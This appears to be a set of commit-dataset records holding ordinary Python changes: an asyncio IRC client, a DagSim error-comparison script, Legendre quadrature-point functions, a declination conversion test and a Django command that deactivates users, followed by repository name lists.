def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send(b'USER meshybot 0 * :MeshyBot7')
self.send(b'NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
<commit_msg>Allow Connection.send to take unicode message<commit_after>import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send('USER meshybot 0 * :MeshyBot7')
self.send('NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
# Cast to bytes
try:
message = message.encode()
except AttributeError:
pass
# Add line ending.
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
|
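The encode-if-possible idiom added to send() can be isolated as a small helper; this sketch only illustrates the same try/except AttributeError pattern and is not code from the framewirc repository.
def to_bytes(message):
    """Return message as bytes, encoding it first if it is a str."""
    try:
        return message.encode()  # str -> bytes (UTF-8 by default)
    except AttributeError:
        return message           # already bytes; pass through unchanged

assert to_bytes('PING') == b'PING'
assert to_bytes(b'PING') == b'PING'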
bea6560ea76bd90766aa486f74593aab26beee27
|
compare_real_to_dagsim.py
|
compare_real_to_dagsim.py
|
#!/usr/bin/env python3
## Copyright 2017 Eugenio Gianniti
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import csv
import os
import sys
from collections import defaultdict
from pathlib import PurePath
if len (sys.argv) != 2:
print ("error: wrong number of input arguments", file = sys.stderr)
sys.exit (2)
else:
root = sys.argv[1]
def parse_dir_name (directory):
experiment = query = None
path = PurePath (directory)
pieces = path.parts
if len (pieces) >= 2:
experiment = pieces[-2]
query = pieces[-1]
return experiment, query
def process_simulations (filename):
results = defaultdict (dict)
with open (filename, newline = '') as csvfile:
reader = csv.DictReader (csvfile)
for row in reader:
query = row["Query"]
if query == row["Run"]:
experiment = row["Experiment"]
results[experiment][query] = float (row["SimAvg"])
return results
def process_summary (filename):
cumsum = 0.
count = 0
with open (filename, newline = '') as csvfile:
# Skip first line with application class
try:
next (csvfile)
except StopIteration:
pass
reader = csv.DictReader (csvfile)
for row in reader:
cumsum += float (row["applicationCompletionTime"]) - float (row["applicationDeltaBeforeComputing"])
count += 1
return cumsum / count
avg_R = defaultdict (dict)
for directory, _, files in os.walk (root):
for filename in files:
full_path = os.path.join (directory, filename)
if filename == "summary.csv":
experiment, query = parse_dir_name (directory)
result = process_summary (full_path)
avg_R[experiment][query] = result
elif filename == "simulations.csv":
sim_R = process_simulations (full_path)
errors = {experiment: {query: (sim_R[experiment][query] - real) / real
for query, real in inner.items ()}
for experiment, inner in avg_R.items ()}
fields = ["Experiment", "Query", "Error[1]"]
rows = ([experiment, query, error] for experiment, inner in errors.items ()
for query, error in inner.items())
writer = csv.writer (sys.stdout)
writer.writerow (fields)
writer.writerows (rows)
|
Add script to compare the error between real data and DagSim simulations
|
Add script to compare the error between real data and DagSim simulations
|
Python
|
apache-2.0
|
deib-polimi/Spark-Log-Parser,deib-polimi/Spark-Log-Parser
|
Add script to compare the error between real data and DagSim simulations
|
#!/usr/bin/env python3
## Copyright 2017 Eugenio Gianniti
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import csv
import os
import sys
from collections import defaultdict
from pathlib import PurePath
if len (sys.argv) != 2:
print ("error: wrong number of input arguments", file = sys.stderr)
sys.exit (2)
else:
root = sys.argv[1]
def parse_dir_name (directory):
experiment = query = None
path = PurePath (directory)
pieces = path.parts
if len (pieces) >= 2:
experiment = pieces[-2]
query = pieces[-1]
return experiment, query
def process_simulations (filename):
results = defaultdict (dict)
with open (filename, newline = '') as csvfile:
reader = csv.DictReader (csvfile)
for row in reader:
query = row["Query"]
if query == row["Run"]:
experiment = row["Experiment"]
results[experiment][query] = float (row["SimAvg"])
return results
def process_summary (filename):
cumsum = 0.
count = 0
with open (filename, newline = '') as csvfile:
# Skip first line with application class
try:
next (csvfile)
except StopIteration:
pass
reader = csv.DictReader (csvfile)
for row in reader:
cumsum += float (row["applicationCompletionTime"]) - float (row["applicationDeltaBeforeComputing"])
count += 1
return cumsum / count
avg_R = defaultdict (dict)
for directory, _, files in os.walk (root):
for filename in files:
full_path = os.path.join (directory, filename)
if filename == "summary.csv":
experiment, query = parse_dir_name (directory)
result = process_summary (full_path)
avg_R[experiment][query] = result
elif filename == "simulations.csv":
sim_R = process_simulations (full_path)
errors = {experiment: {query: (sim_R[experiment][query] - real) / real
for query, real in inner.items ()}
for experiment, inner in avg_R.items ()}
fields = ["Experiment", "Query", "Error[1]"]
rows = ([experiment, query, error] for experiment, inner in errors.items ()
for query, error in inner.items())
writer = csv.writer (sys.stdout)
writer.writerow (fields)
writer.writerows (rows)
|
<commit_before><commit_msg>Add script to compare the error between real data and DagSim simulations<commit_after>
|
#!/usr/bin/env python3
## Copyright 2017 Eugenio Gianniti
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import csv
import os
import sys
from collections import defaultdict
from pathlib import PurePath
if len (sys.argv) != 2:
print ("error: wrong number of input arguments", file = sys.stderr)
sys.exit (2)
else:
root = sys.argv[1]
def parse_dir_name (directory):
experiment = query = None
path = PurePath (directory)
pieces = path.parts
if len (pieces) >= 2:
experiment = pieces[-2]
query = pieces[-1]
return experiment, query
def process_simulations (filename):
results = defaultdict (dict)
with open (filename, newline = '') as csvfile:
reader = csv.DictReader (csvfile)
for row in reader:
query = row["Query"]
if query == row["Run"]:
experiment = row["Experiment"]
results[experiment][query] = float (row["SimAvg"])
return results
def process_summary (filename):
cumsum = 0.
count = 0
with open (filename, newline = '') as csvfile:
# Skip first line with application class
try:
next (csvfile)
except StopIteration:
pass
reader = csv.DictReader (csvfile)
for row in reader:
cumsum += float (row["applicationCompletionTime"]) - float (row["applicationDeltaBeforeComputing"])
count += 1
return cumsum / count
avg_R = defaultdict (dict)
for directory, _, files in os.walk (root):
for filename in files:
full_path = os.path.join (directory, filename)
if filename == "summary.csv":
experiment, query = parse_dir_name (directory)
result = process_summary (full_path)
avg_R[experiment][query] = result
elif filename == "simulations.csv":
sim_R = process_simulations (full_path)
errors = {experiment: {query: (sim_R[experiment][query] - real) / real
for query, real in inner.items ()}
for experiment, inner in avg_R.items ()}
fields = ["Experiment", "Query", "Error[1]"]
rows = ([experiment, query, error] for experiment, inner in errors.items ()
for query, error in inner.items())
writer = csv.writer (sys.stdout)
writer.writerow (fields)
writer.writerows (rows)
|
Add script to compare the error between real data and DagSim simulations#!/usr/bin/env python3
## Copyright 2017 Eugenio Gianniti
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import csv
import os
import sys
from collections import defaultdict
from pathlib import PurePath
if len (sys.argv) != 2:
print ("error: wrong number of input arguments", file = sys.stderr)
sys.exit (2)
else:
root = sys.argv[1]
def parse_dir_name (directory):
experiment = query = None
path = PurePath (directory)
pieces = path.parts
if len (pieces) >= 2:
experiment = pieces[-2]
query = pieces[-1]
return experiment, query
def process_simulations (filename):
results = defaultdict (dict)
with open (filename, newline = '') as csvfile:
reader = csv.DictReader (csvfile)
for row in reader:
query = row["Query"]
if query == row["Run"]:
experiment = row["Experiment"]
results[experiment][query] = float (row["SimAvg"])
return results
def process_summary (filename):
cumsum = 0.
count = 0
with open (filename, newline = '') as csvfile:
# Skip first line with application class
try:
next (csvfile)
except StopIteration:
pass
reader = csv.DictReader (csvfile)
for row in reader:
cumsum += float (row["applicationCompletionTime"]) - float (row["applicationDeltaBeforeComputing"])
count += 1
return cumsum / count
avg_R = defaultdict (dict)
for directory, _, files in os.walk (root):
for filename in files:
full_path = os.path.join (directory, filename)
if filename == "summary.csv":
experiment, query = parse_dir_name (directory)
result = process_summary (full_path)
avg_R[experiment][query] = result
elif filename == "simulations.csv":
sim_R = process_simulations (full_path)
errors = {experiment: {query: (sim_R[experiment][query] - real) / real
for query, real in inner.items ()}
for experiment, inner in avg_R.items ()}
fields = ["Experiment", "Query", "Error[1]"]
rows = ([experiment, query, error] for experiment, inner in errors.items ()
for query, error in inner.items())
writer = csv.writer (sys.stdout)
writer.writerow (fields)
writer.writerows (rows)
|
<commit_before><commit_msg>Add script to compare the error between real data and DagSim simulations<commit_after>#!/usr/bin/env python3
## Copyright 2017 Eugenio Gianniti
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import csv
import os
import sys
from collections import defaultdict
from pathlib import PurePath
if len (sys.argv) != 2:
print ("error: wrong number of input arguments", file = sys.stderr)
sys.exit (2)
else:
root = sys.argv[1]
def parse_dir_name (directory):
experiment = query = None
path = PurePath (directory)
pieces = path.parts
if len (pieces) >= 2:
experiment = pieces[-2]
query = pieces[-1]
return experiment, query
def process_simulations (filename):
results = defaultdict (dict)
with open (filename, newline = '') as csvfile:
reader = csv.DictReader (csvfile)
for row in reader:
query = row["Query"]
if query == row["Run"]:
experiment = row["Experiment"]
results[experiment][query] = float (row["SimAvg"])
return results
def process_summary (filename):
cumsum = 0.
count = 0
with open (filename, newline = '') as csvfile:
# Skip first line with application class
try:
next (csvfile)
except StopIteration:
pass
reader = csv.DictReader (csvfile)
for row in reader:
cumsum += float (row["applicationCompletionTime"]) - float (row["applicationDeltaBeforeComputing"])
count += 1
return cumsum / count
avg_R = defaultdict (dict)
for directory, _, files in os.walk (root):
for filename in files:
full_path = os.path.join (directory, filename)
if filename == "summary.csv":
experiment, query = parse_dir_name (directory)
result = process_summary (full_path)
avg_R[experiment][query] = result
elif filename == "simulations.csv":
sim_R = process_simulations (full_path)
errors = {experiment: {query: (sim_R[experiment][query] - real) / real
for query, real in inner.items ()}
for experiment, inner in avg_R.items ()}
fields = ["Experiment", "Query", "Error[1]"]
rows = ([experiment, query, error] for experiment, inner in errors.items ()
for query, error in inner.items())
writer = csv.writer (sys.stdout)
writer.writerow (fields)
writer.writerows (rows)
|
|
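The quantity written to each output row above is the signed relative deviation of the simulated average from the measured one; the standalone sketch below restates that metric, with the function name relative_error invented for illustration. The script itself is invoked as python3 compare_real_to_dagsim.py <root>, where <root> contains one <experiment>/<query>/summary.csv per real run plus a simulations.csv with the DagSim results.
def relative_error(simulated, real):
    # (SimAvg - realAvg) / realAvg, as computed in the errors dict above
    return (simulated - real) / real

assert relative_error(110.0, 100.0) == 0.1   # simulator over-estimates by 10%
assert relative_error(90.0, 100.0) == -0.1   # simulator under-estimates by 10%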
25606b72e55a4a79347830e7b33aa623fbdff08f
|
pyfr/polys.py
|
pyfr/polys.py
|
# -*- coding: utf-8 -*-
from sympy import Poly, legendre_poly, diff
from sympy.abc import x
from mpmath import polyroots
def gauss_legendre_points(n):
"""Returns the Gauss-Legendre quadrature points for order *n*
These are defined as the roots of P_n where P_n is the n'th
Legendre polynomial.
"""
coeffs = Poly(legendre_poly(n, x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [float(r) for r in roots]
def lobatto_points(n):
"""Returns the Lobatto quadrature points for order *n*
These are defined as the roots of P'_(n-1), where P'_(n-1) is the
first derivative of the (n-1)'th Legendre polynomial, plus the
points -1.0 and +1.0.
"""
coeffs = Poly(diff(legendre_poly(n-1, x), x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [-1.0] + [float(r) for r in roots] + [1.0]
|
Add some polynomial-related functions. These will be useful later.
|
Add some polynomial-related functions. These will be useful later.
|
Python
|
bsd-3-clause
|
tjcorona/PyFR,iyer-arvind/PyFR,Aerojspark/PyFR,BrianVermeire/PyFR,tjcorona/PyFR,tjcorona/PyFR
|
Add some polynomial-related functions. These will be useful later.
|
# -*- coding: utf-8 -*-
from sympy import Poly, legendre_poly, diff
from sympy.abc import x
from mpmath import polyroots
def gauss_legendre_points(n):
"""Returns the Gauss-Legendre quadrature points for order *n*
These are defined as the roots of P_n where P_n is the n'th
Legendre polynomial.
"""
coeffs = Poly(legendre_poly(n, x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [float(r) for r in roots]
def lobatto_points(n):
"""Returns the Lobatto quadrature points for order *n*
These are defined as the roots of P'_(n-1), where P'_(n-1) is the
first derivative of the (n-1)'th Legendre polynomial, plus the
points -1.0 and +1.0.
"""
coeffs = Poly(diff(legendre_poly(n-1, x), x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [-1.0] + [float(r) for r in roots] + [1.0]
|
<commit_before><commit_msg>Add some polynomial-related functions. These will be useful later.<commit_after>
|
# -*- coding: utf-8 -*-
from sympy import Poly, legendre_poly, diff
from sympy.abc import x
from mpmath import polyroots
def gauss_legendre_points(n):
"""Returns the Gauss-Legendre quadrature points for order *n*
These are defined as the roots of P_n where P_n is the n'th
Legendre polynomial.
"""
coeffs = Poly(legendre_poly(n, x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [float(r) for r in roots]
def lobatto_points(n):
"""Returns the Lobatto quadrature points for order *n*
These are defined as the roots of P'_(n-1), where P'_(n-1) is the
first derivative of the (n-1)'th Legendre polynomial, plus the
points -1.0 and +1.0.
"""
coeffs = Poly(diff(legendre_poly(n-1, x), x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [-1.0] + [float(r) for r in roots] + [1.0]
|
Add some polynomial-related functions. These will be useful later.# -*- coding: utf-8 -*-
from sympy import Poly, legendre_poly, diff
from sympy.abc import x
from mpmath import polyroots
def gauss_legendre_points(n):
"""Returns the Gauss-Legendre quadrature points for order *n*
These are defined as the roots of P_n where P_n is the n'th
Legendre polynomial.
"""
coeffs = Poly(legendre_poly(n, x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [float(r) for r in roots]
def lobatto_points(n):
"""Returns the Lobatto quadrature points for order *n*
These are defined as the roots of P'_(n-1), where P'_(n-1) is the
first derivative of the (n-1)'th Legendre polynomial, plus the
points -1.0 and +1.0.
"""
coeffs = Poly(diff(legendre_poly(n-1, x), x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [-1.0] + [float(r) for r in roots] + [1.0]
|
<commit_before><commit_msg>Add some polynomial-related functions. These will be useful later.<commit_after># -*- coding: utf-8 -*-
from sympy import Poly, legendre_poly, diff
from sympy.abc import x
from mpmath import polyroots
def gauss_legendre_points(n):
"""Returns the Gauss-Legendre quadrature points for order *n*
These are defined as the roots of P_n where P_n is the n'th
Legendre polynomial.
"""
coeffs = Poly(legendre_poly(n, x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [float(r) for r in roots]
def lobatto_points(n):
"""Returns the Lobatto quadrature points for order *n*
These are defined as the roots of P'_(n-1), where P'_(n-1) is the
first derivative of the (n-1)'th Legendre polynomial, plus the
points -1.0 and +1.0.
"""
coeffs = Poly(diff(legendre_poly(n-1, x), x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [-1.0] + [float(r) for r in roots] + [1.0]
|
|
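As a quick sanity check on gauss_legendre_points, NumPy ships the same nodes: numpy.polynomial.legendre.leggauss returns the Gauss-Legendre points together with their quadrature weights. The sketch below assumes NumPy is available and is independent of the module above.
import numpy as np

# Order 3: the roots of P_3(x) = (5x^3 - 3x)/2 are -sqrt(3/5), 0, +sqrt(3/5).
points, _weights = np.polynomial.legendre.leggauss(3)
assert np.allclose(points, [-(3 / 5) ** 0.5, 0.0, (3 / 5) ** 0.5])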
905b4cc269279ba444fe4114a64b6f9bf9663312
|
tests/test_visibility.py
|
tests/test_visibility.py
|
"""Test code for visibilty.py."""
import pytest
from visibility import decdeg2dms, StarObsPlot, VisibilityPlot
@pytest.mark.parametrize("test_input,expected", [
(0, (0, 0, 0)),
(33.33, (33, 19, 48)),
(-45.5125, (-45, 30, 45)),
(60.60, (60, 36, 0)),
(-90, (-90, 0, 0)),
])
def test_decdeg2dms(test_input, expected):
"""Test of converting decimal declination."""
# Possibly limit to +/-90 deg somewhere.
assert decdeg2dms(test_input) == expected
|
Add a test for decimal declination conversion.
|
Add a test for decimal declination conversion.
|
Python
|
mit
|
DanielAndreasen/ObservationTools,iastro-pt/ObservationTools
|
Add a test for decimal declination conversion.
|
"""Test code for visibilty.py."""
import pytest
from visibility import decdeg2dms, StarObsPlot, VisibilityPlot
@pytest.mark.parametrize("test_input,expected", [
(0, (0, 0, 0)),
(33.33, (33, 19, 48)),
(-45.5125, (-45, 30, 45)),
(60.60, (60, 36, 0)),
(-90, (-90, 0, 0)),
])
def test_decdeg2dms(test_input, expected):
"""Test of converting decimal declination."""
# Possibly limit to +/-90 deg somewhere.
assert decdeg2dms(test_input) == expected
|
<commit_before><commit_msg>Add a test for decimal declination conversion.<commit_after>
|
"""Test code for visibilty.py."""
import pytest
from visibility import decdeg2dms, StarObsPlot, VisibilityPlot
@pytest.mark.parametrize("test_input,expected", [
(0, (0, 0, 0)),
(33.33, (33, 19, 48)),
(-45.5125, (-45, 30, 45)),
(60.60, (60, 36, 0)),
(-90, (-90, 0, 0)),
])
def test_decdeg2dms(test_input, expected):
"""Test of converting decimal declination."""
# Possibly limit to +/-90 deg somewhere.
assert decdeg2dms(test_input) == expected
|
Add a test for decimal declination conversion."""Test code for visibility.py."""
import pytest
from visibility import decdeg2dms, StarObsPlot, VisibilityPlot
@pytest.mark.parametrize("test_input,expected", [
(0, (0, 0, 0)),
(33.33, (33, 19, 48)),
(-45.5125, (-45, 30, 45)),
(60.60, (60, 36, 0)),
(-90, (-90, 0, 0)),
])
def test_decdeg2dms(test_input, expected):
"""Test of converting decimal declination."""
# Possibly limit to +/-90 deg somewhere.
assert decdeg2dms(test_input) == expected
|
<commit_before><commit_msg>Add a test for decimal declination conversion.<commit_after>"""Test code for visibility.py."""
import pytest
from visibility import decdeg2dms, StarObsPlot, VisibilityPlot
@pytest.mark.parametrize("test_input,expected", [
(0, (0, 0, 0)),
(33.33, (33, 19, 48)),
(-45.5125, (-45, 30, 45)),
(60.60, (60, 36, 0)),
(-90, (-90, 0, 0)),
])
def test_decdeg2dms(test_input, expected):
"""Test of converting decimal declination."""
# Possibly limit to +/-90 deg somewhere.
assert decdeg2dms(test_input) == expected
|
|
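The expected tuples in the test imply that whole degrees and minutes are truncated while the sign rides on the degrees field. One possible reference implementation consistent with those cases is sketched below; it is only an illustration, and the real decdeg2dms in visibility.py may differ (the seconds are rounded here to absorb floating-point error).
def decdeg2dms_sketch(dd):
    """Convert decimal degrees to a (degrees, minutes, seconds) tuple."""
    sign = -1 if dd < 0 else 1
    minutes, seconds = divmod(abs(dd) * 3600, 60)
    degrees, minutes = divmod(minutes, 60)
    return (sign * int(degrees), int(minutes), int(round(seconds)))

assert decdeg2dms_sketch(33.33) == (33, 19, 48)
assert decdeg2dms_sketch(-45.5125) == (-45, 30, 45)
assert decdeg2dms_sketch(-90) == (-90, 0, 0)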
7ee945062db49db7bab8a2f43a0ffebb9985ef7a
|
zephyr/management/commands/test_deactivate.py
|
zephyr/management/commands/test_deactivate.py
|
from optparse import make_option
from django.core.management.base import BaseCommand
from confirmation.models import Confirmation
from zephyr.models import User, MitUser
class Command(BaseCommand):
help = "Mark one or more users as inactive in the database."
def handle(self, *args, **options):
for email in args:
try:
user = User.objects.get(email=email)
if user.is_active:
user.is_active = False
user.save()
print email + ": Deactivated."
else:
print email + ": Already inactive."
except User.DoesNotExist:
print email + ": User does not exist in database"
|
Add command to mark users as inactive.
|
Add command to mark users as inactive.
This is useful when testing the signup workflow, as this script enables you
to run through an MIT signup without manually creating a new inactive user
in the database.
(imported from commit c22649cc7c561c2fbe8682d1b17d7e5aba9ac04e)
|
Python
|
apache-2.0
|
luyifan/zulip,jonesgithub/zulip,vakila/zulip,SmartPeople/zulip,ahmadassaf/zulip,he15his/zulip,arpitpanwar/zulip,mahim97/zulip,hengqujushi/zulip,ashwinirudrappa/zulip,zacps/zulip,proliming/zulip,arpitpanwar/zulip,saitodisse/zulip,saitodisse/zulip,seapasulli/zulip,mohsenSy/zulip,themass/zulip,Cheppers/zulip,peguin40/zulip,wangdeshui/zulip,grave-w-grave/zulip,noroot/zulip,SmartPeople/zulip,dnmfarrell/zulip,jeffcao/zulip,he15his/zulip,dxq-git/zulip,joyhchen/zulip,dawran6/zulip,tdr130/zulip,xuanhan863/zulip,developerfm/zulip,saitodisse/zulip,isht3/zulip,hayderimran7/zulip,dnmfarrell/zulip,KJin99/zulip,yuvipanda/zulip,EasonYi/zulip,noroot/zulip,kokoar/zulip,eastlhu/zulip,he15his/zulip,synicalsyntax/zulip,aps-sids/zulip,Qgap/zulip,deer-hope/zulip,Juanvulcano/zulip,jessedhillon/zulip,KingxBanana/zulip,MariaFaBella85/zulip,eeshangarg/zulip,easyfmxu/zulip,jimmy54/zulip,amyliu345/zulip,sharmaeklavya2/zulip,jerryge/zulip,bssrdf/zulip,jessedhillon/zulip,codeKonami/zulip,gigawhitlocks/zulip,paxapy/zulip,rht/zulip,brainwane/zulip,LAndreas/zulip,Galexrt/zulip,proliming/zulip,lfranchi/zulip,amallia/zulip,aakash-cr7/zulip,reyha/zulip,bluesea/zulip,ahmadassaf/zulip,fw1121/zulip,reyha/zulip,saitodisse/zulip,kaiyuanheshang/zulip,yocome/zulip,jimmy54/zulip,ashwinirudrappa/zulip,Gabriel0402/zulip,amanharitsh123/zulip,eeshangarg/zulip,umkay/zulip,so0k/zulip,amallia/zulip,nicholasbs/zulip,Vallher/zulip,vikas-parashar/zulip,jphilipsen05/zulip,aliceriot/zulip,zofuthan/zulip,MariaFaBella85/zulip,brockwhittaker/zulip,KJin99/zulip,zulip/zulip,peguin40/zulip,jrowan/zulip,esander91/zulip,tdr130/zulip,huangkebo/zulip,ryansnowboarder/zulip,Frouk/zulip,lfranchi/zulip,atomic-labs/zulip,alliejones/zulip,Drooids/zulip,johnnygaddarr/zulip,moria/zulip,shrikrishnaholla/zulip,shrikrishnaholla/zulip,johnny9/zulip,jainayush975/zulip,KingxBanana/zulip,Suninus/zulip,timabbott/zulip,so0k/zulip,esander91/zulip,cosmicAsymmetry/zulip,guiquanz/zulip,seapasulli/zulip,mdavid/zulip,dhcrzf/zulip,proliming/zulip,zhaoweigg/zulip,zulip/zulip,bowlofstew/zulip,dwrpayne/zulip,Drooids/zulip,jainayush975/zulip,ryanbackman/zulip,PhilSk/zulip,JPJPJPOPOP/zulip,atomic-labs/zulip,m1ssou/zulip,Galexrt/zulip,hengqujushi/zulip,joshisa/zulip,praveenaki/zulip,levixie/zulip,bluesea/zulip,Vallher/zulip,jrowan/zulip,wavelets/zulip,proliming/zulip,isht3/zulip,thomasboyt/zulip,Frouk/zulip,shrikrishnaholla/zulip,synicalsyntax/zulip,reyha/zulip,esander91/zulip,blaze225/zulip,eeshangarg/zulip,so0k/zulip,bssrdf/zulip,firstblade/zulip,zofuthan/zulip,AZtheAsian/zulip,moria/zulip,so0k/zulip,schatt/zulip,kaiyuanheshang/zulip,SmartPeople/zulip,fw1121/zulip,praveenaki/zulip,ikasumiwt/zulip,j831/zulip,bssrdf/zulip,alliejones/zulip,KJin99/zulip,tdr130/zulip,LeeRisk/zulip,ufosky-server/zulip,arpitpanwar/zulip,RobotCaleb/zulip,amallia/zulip,swinghu/zulip,tbutter/zulip,zulip/zulip,EasonYi/zulip,themass/zulip,ahmadassaf/zulip,joshisa/zulip,LeeRisk/zulip,seapasulli/zulip,luyifan/zulip,xuxiao/zulip,krtkmj/zulip,bssrdf/zulip,dnmfarrell/zulip,rishig/zulip,tiansiyuan/zulip,zachallaun/zulip,ericzhou2008/zulip,fw1121/zulip,amallia/zulip,ApsOps/zulip,Cheppers/zulip,amyliu345/zulip,esander91/zulip,punchagan/zulip,sharmaeklavya2/zulip,natanovia/zulip,natanovia/zulip,PhilSk/zulip,LeeRisk/zulip,tommyip/zulip,Cheppers/zulip,DazWorrall/zulip,joshisa/zulip,arpith/zulip,bastianh/zulip,ahmadassaf/zulip,ericzhou2008/zulip,babbage/zulip,Cheppers/zulip,rishig/zulip,lfranchi/zulip,niftynei/zulip,swinghu/zulip,zwily/zulip,jrowan/zulip,hj3938/zulip,wdaher/zulip,voidException/zulip,wweiradio/zulip,paxapy/z
ulip,ashwinirudrappa/zulip,jonesgithub/zulip,developerfm/zulip,zhaoweigg/zulip,luyifan/zulip,vakila/zulip,wangdeshui/zulip,johnny9/zulip,showell/zulip,kou/zulip,ryansnowboarder/zulip,zacps/zulip,kokoar/zulip,eastlhu/zulip,stamhe/zulip,littledogboy/zulip,brainwane/zulip,qq1012803704/zulip,easyfmxu/zulip,themass/zulip,LeeRisk/zulip,willingc/zulip,technicalpickles/zulip,nicholasbs/zulip,huangkebo/zulip,PaulPetring/zulip,vakila/zulip,amyliu345/zulip,willingc/zulip,Suninus/zulip,bitemyapp/zulip,pradiptad/zulip,jonesgithub/zulip,qq1012803704/zulip,yocome/zulip,shaunstanislaus/zulip,blaze225/zulip,natanovia/zulip,johnnygaddarr/zulip,bowlofstew/zulip,eeshangarg/zulip,mdavid/zulip,mohsenSy/zulip,PhilSk/zulip,Frouk/zulip,Drooids/zulip,shrikrishnaholla/zulip,zulip/zulip,udxxabp/zulip,gkotian/zulip,xuanhan863/zulip,DazWorrall/zulip,Suninus/zulip,calvinleenyc/zulip,karamcnair/zulip,PaulPetring/zulip,hayderimran7/zulip,JPJPJPOPOP/zulip,praveenaki/zulip,aps-sids/zulip,zorojean/zulip,codeKonami/zulip,huangkebo/zulip,voidException/zulip,arpitpanwar/zulip,aps-sids/zulip,KJin99/zulip,JanzTam/zulip,showell/zulip,zachallaun/zulip,udxxabp/zulip,jimmy54/zulip,eastlhu/zulip,luyifan/zulip,jimmy54/zulip,sup95/zulip,akuseru/zulip,littledogboy/zulip,sup95/zulip,KJin99/zulip,fw1121/zulip,Gabriel0402/zulip,j831/zulip,qq1012803704/zulip,yocome/zulip,so0k/zulip,wavelets/zulip,souravbadami/zulip,ashwinirudrappa/zulip,Vallher/zulip,dxq-git/zulip,hafeez3000/zulip,vabs22/zulip,verma-varsha/zulip,wangdeshui/zulip,qq1012803704/zulip,wweiradio/zulip,gkotian/zulip,johnny9/zulip,amyliu345/zulip,rht/zulip,Suninus/zulip,lfranchi/zulip,andersk/zulip,bluesea/zulip,willingc/zulip,JanzTam/zulip,zachallaun/zulip,kaiyuanheshang/zulip,qq1012803704/zulip,hengqujushi/zulip,wdaher/zulip,littledogboy/zulip,ufosky-server/zulip,Qgap/zulip,itnihao/zulip,gkotian/zulip,thomasboyt/zulip,tiansiyuan/zulip,levixie/zulip,hackerkid/zulip,noroot/zulip,pradiptad/zulip,rht/zulip,akuseru/zulip,MayB/zulip,bitemyapp/zulip,krtkmj/zulip,ryansnowboarder/zulip,gkotian/zulip,easyfmxu/zulip,TigorC/zulip,easyfmxu/zulip,wangdeshui/zulip,bluesea/zulip,johnny9/zulip,swinghu/zulip,punchagan/zulip,Galexrt/zulip,jeffcao/zulip,xuxiao/zulip,willingc/zulip,hayderimran7/zulip,tdr130/zulip,tiansiyuan/zulip,LAndreas/zulip,stamhe/zulip,PaulPetring/zulip,nicholasbs/zulip,gigawhitlocks/zulip,brockwhittaker/zulip,sou